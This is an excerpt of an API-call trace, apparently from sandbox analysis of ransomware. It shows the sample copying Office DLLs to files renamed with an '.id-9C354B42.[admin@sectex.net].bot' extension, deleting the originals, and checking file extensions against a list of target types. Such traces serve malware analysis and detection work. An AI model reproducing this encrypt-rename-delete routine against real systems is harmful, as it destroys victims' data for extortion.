	[0055.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.598] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.598] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0055.599] GetLastError () returned 0x0
	[0055.599] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xd2990, lpOverlapped=0x0) returned 1
	[0056.587] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xd29a0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xd29a0, lpOverlapped=0x0) returned 1
	[0056.604] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.604] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0056.604] SetEndOfFile (hFile=0x158) returned 1
	[0056.855] CloseHandle (hObject=0x158) returned 1
	[0056.855] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.855] SetEndOfFile (hFile=0x234) returned 1
	[0056.862] CloseHandle (hObject=0x234) returned 1
	[0056.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.862] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 1
	[0057.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.794] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.794] lstrlenW (lpString=".doc") returned 4
	[0057.794] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0057.794] lstrlenW (lpString=".docx") returned 5
	[0057.795] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0057.795] lstrlenW (lpString=".pdf") returned 4
	[0057.795] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0057.795] lstrlenW (lpString=".xls") returned 4
	[0057.795] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0057.795] lstrlenW (lpString=".xlsx") returned 5
	[0057.795] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0057.795] lstrlenW (lpString=".ppt") returned 4
	[0057.795] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0057.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.795] lstrlenW (lpString=".zip") returned 4
	[0057.795] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0057.795] lstrlenW (lpString=".rar") returned 4
	[0057.795] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0057.795] lstrlenW (lpString=".bz2") returned 4
	[0057.795] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0057.795] lstrlenW (lpString=".7z") returned 3
	[0057.795] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0057.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.795] lstrlenW (lpString=".dbf") returned 4
	[0057.795] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0057.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.795] lstrlenW (lpString=".1cd") returned 4
	[0057.795] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0057.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.795] lstrlenW (lpString=".jpg") returned 4
	[0057.795] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0057.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.795] lstrlenW (lpString=".doc") returned 4
	[0057.795] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0057.795] lstrlenW (lpString=".docx") returned 5
	[0057.795] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0057.795] lstrlenW (lpString=".pdf") returned 4
	[0057.796] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0057.796] lstrlenW (lpString=".xls") returned 4
	[0057.796] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0057.796] lstrlenW (lpString=".xlsx") returned 5
	[0057.796] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0057.796] lstrlenW (lpString=".ppt") returned 4
	[0057.796] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0057.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.796] lstrlenW (lpString=".zip") returned 4
	[0057.796] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0057.796] lstrlenW (lpString=".rar") returned 4
	[0057.796] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0057.796] lstrlenW (lpString=".bz2") returned 4
	[0057.796] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0057.796] lstrlenW (lpString=".7z") returned 3
	[0057.796] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0057.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.796] lstrlenW (lpString=".dbf") returned 4
	[0057.796] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0057.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.796] lstrlenW (lpString=".1cd") returned 4
	[0057.796] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0057.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72
	[0057.796] lstrlenW (lpString=".jpg") returned 4
	[0057.796] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0057.796] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0057.796] lstrlenW (lpString="xlsrvintl.dll") returned 13
	[0057.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0058.055] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=105344) returned 1
	[0058.055] CloseHandle (hObject=0x1a8) returned 1
	[0058.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 0x20
	[0058.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.055] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0058.056] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.056] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.056] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0058.056] GetLastError () returned 0x0
	[0058.056] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x19b80, lpOverlapped=0x0) returned 1
	[0058.071] WriteFile (in: hFile=0x1b0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x19b90, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x19b90, lpOverlapped=0x0) returned 1
	[0058.073] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.073] WriteFile (in: hFile=0x1b0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0058.073] SetEndOfFile (hFile=0x1b0) returned 1
	[0058.073] CloseHandle (hObject=0x1b0) returned 1
	[0058.073] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.073] SetEndOfFile (hFile=0x1a8) returned 1
	[0058.075] CloseHandle (hObject=0x1a8) returned 1
	[0058.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.075] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 1
	[0058.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.075] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.075] lstrlenW (lpString=".doc") returned 4
	[0058.075] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0058.075] lstrlenW (lpString=".docx") returned 5
	[0058.075] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0058.075] lstrlenW (lpString=".pdf") returned 4
	[0058.075] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0058.075] lstrlenW (lpString=".xls") returned 4
	[0058.075] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0058.075] lstrlenW (lpString=".xlsx") returned 5
	[0058.076] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0058.076] lstrlenW (lpString=".ppt") returned 4
	[0058.076] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0058.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.076] lstrlenW (lpString=".zip") returned 4
	[0058.076] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0058.076] lstrlenW (lpString=".rar") returned 4
	[0058.076] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0058.076] lstrlenW (lpString=".bz2") returned 4
	[0058.076] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0058.076] lstrlenW (lpString=".7z") returned 3
	[0058.076] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0058.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.076] lstrlenW (lpString=".dbf") returned 4
	[0058.076] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0058.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.076] lstrlenW (lpString=".1cd") returned 4
	[0058.076] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0058.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.076] lstrlenW (lpString=".jpg") returned 4
	[0058.076] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0058.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.076] lstrlenW (lpString=".doc") returned 4
	[0058.076] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0058.076] lstrlenW (lpString=".docx") returned 5
	[0058.076] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0058.076] lstrlenW (lpString=".pdf") returned 4
	[0058.076] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0058.076] lstrlenW (lpString=".xls") returned 4
	[0058.076] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0058.076] lstrlenW (lpString=".xlsx") returned 5
	[0058.076] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0058.076] lstrlenW (lpString=".ppt") returned 4
	[0058.076] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0058.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.077] lstrlenW (lpString=".zip") returned 4
	[0058.077] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0058.077] lstrlenW (lpString=".rar") returned 4
	[0058.077] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0058.077] lstrlenW (lpString=".bz2") returned 4
	[0058.077] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0058.077] lstrlenW (lpString=".7z") returned 3
	[0058.077] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0058.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.077] lstrlenW (lpString=".dbf") returned 4
	[0058.077] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0058.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.077] lstrlenW (lpString=".1cd") returned 4
	[0058.077] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0058.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74
	[0058.077] lstrlenW (lpString=".jpg") returned 4
	[0058.077] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0058.077] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.077] lstrlenW (lpString="ACEERR.DLL") returned 10
	[0058.077] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0058.101] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=43408) returned 1
	[0058.101] CloseHandle (hObject=0x1a8) returned 1
	[0058.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 0x20
	[0058.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0058.102] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.102] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0058.102] GetLastError () returned 0x0
	[0058.102] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xa990, lpOverlapped=0x0) returned 1
	[0058.104] WriteFile (in: hFile=0x1b0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xa9a0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xa9a0, lpOverlapped=0x0) returned 1
	[0058.106] ReadFile (in: hFile=0x1a8, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.106] WriteFile (in: hFile=0x1b0, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0058.106] SetEndOfFile (hFile=0x1b0) returned 1
	[0058.106] CloseHandle (hObject=0x1b0) returned 1
	[0058.106] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.106] SetEndOfFile (hFile=0x1a8) returned 1
	[0058.107] CloseHandle (hObject=0x1a8) returned 1
	[0058.107] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.108] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 1
	[0058.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.108] lstrlenW (lpString=".doc") returned 4
	[0058.108] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.108] lstrlenW (lpString=".docx") returned 5
	[0058.108] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0058.108] lstrlenW (lpString=".pdf") returned 4
	[0058.108] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.108] lstrlenW (lpString=".xls") returned 4
	[0058.108] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.108] lstrlenW (lpString=".xlsx") returned 5
	[0058.108] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0058.108] lstrlenW (lpString=".ppt") returned 4
	[0058.108] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.108] lstrlenW (lpString=".zip") returned 4
	[0058.108] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.108] lstrlenW (lpString=".rar") returned 4
	[0058.108] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.108] lstrlenW (lpString=".bz2") returned 4
	[0058.108] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.108] lstrlenW (lpString=".7z") returned 3
	[0058.108] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.108] lstrlenW (lpString=".dbf") returned 4
	[0058.108] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.108] lstrlenW (lpString=".1cd") returned 4
	[0058.108] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.108] lstrlenW (lpString=".jpg") returned 4
	[0058.108] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.109] lstrlenW (lpString=".doc") returned 4
	[0058.109] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.109] lstrlenW (lpString=".docx") returned 5
	[0058.109] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0058.109] lstrlenW (lpString=".pdf") returned 4
	[0058.109] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.109] lstrlenW (lpString=".xls") returned 4
	[0058.109] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.109] lstrlenW (lpString=".xlsx") returned 5
	[0058.109] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0058.109] lstrlenW (lpString=".ppt") returned 4
	[0058.109] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.109] lstrlenW (lpString=".zip") returned 4
	[0058.109] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.109] lstrlenW (lpString=".rar") returned 4
	[0058.109] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.109] lstrlenW (lpString=".bz2") returned 4
	[0058.109] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.109] lstrlenW (lpString=".7z") returned 3
	[0058.109] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.109] lstrlenW (lpString=".dbf") returned 4
	[0058.109] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.109] lstrlenW (lpString=".1cd") returned 4
	[0058.109] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66
	[0058.109] lstrlenW (lpString=".jpg") returned 4
	[0058.109] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.110] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.110] lstrlenW (lpString="ACEES.DLL") returned 9
	[0058.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0058.111] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=1012648) returned 1
	[0058.111] CloseHandle (hObject=0x1a8) returned 1
